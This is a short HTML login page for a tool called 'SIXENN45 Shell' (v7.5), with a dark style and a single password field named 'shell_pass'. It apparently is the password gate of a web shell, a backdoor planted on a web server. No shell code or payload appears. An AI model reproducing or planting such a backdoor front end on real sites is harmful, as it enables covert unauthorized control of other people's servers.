<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html>
    <html>
    <head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Login</title>
    <style>
    body{margin:0;background:#1c1c1c;color:#ccc;font-family:Verdana,Arial,sans-serif;font-size:13px}
    .wrap{width:360px;margin:120px auto;background:#262626;border:1px solid #3a3a3a;padding:22px 26px}
    h1{font-size:15px;margin:0 0 2px;font-weight:normal;color:#eee}
    .note{font-size:11px;color:#888;margin-bottom:18px}
    label{display:block;font-size:11px;color:#aaa;margin-bottom:5px}
    input[type=password]{width:100%;box-sizing:border-box;padding:9px;background:#1a1a1a;border:1px solid #444;color:#ddd;font-size:14px;margin-bottom:14px;outline:none}
    input[type=password]:focus{border-color:#777}
    button{width:100%;padding:9px;background:#333;border:1px solid #555;color:#eee;font-size:13px;cursor:pointer}
    button:hover{background:#3d3d3d}
    .err{background:#3a1d1d;border:1px solid #6b2b2b;color:#e88;padding:8px;font-size:12px;margin-bottom:12px}
    .foot{font-size:10px;color:#666;margin-top:16px;text-align:center}
    </style>
    </head>
    <body>
    <div class="wrap">
        <h1>SIXENN45 Shell</h1>
        <div class="note">Authorized personnel only</div>
                <form method="POST">
            <label>Password</label>
            <input type="password" name="shell_pass" autofocus autocomplete="off">
            <button type="submit">Login</button>
        </form>
        <div class="foot">v7.5</div>
    </div>
    </body>
    </html>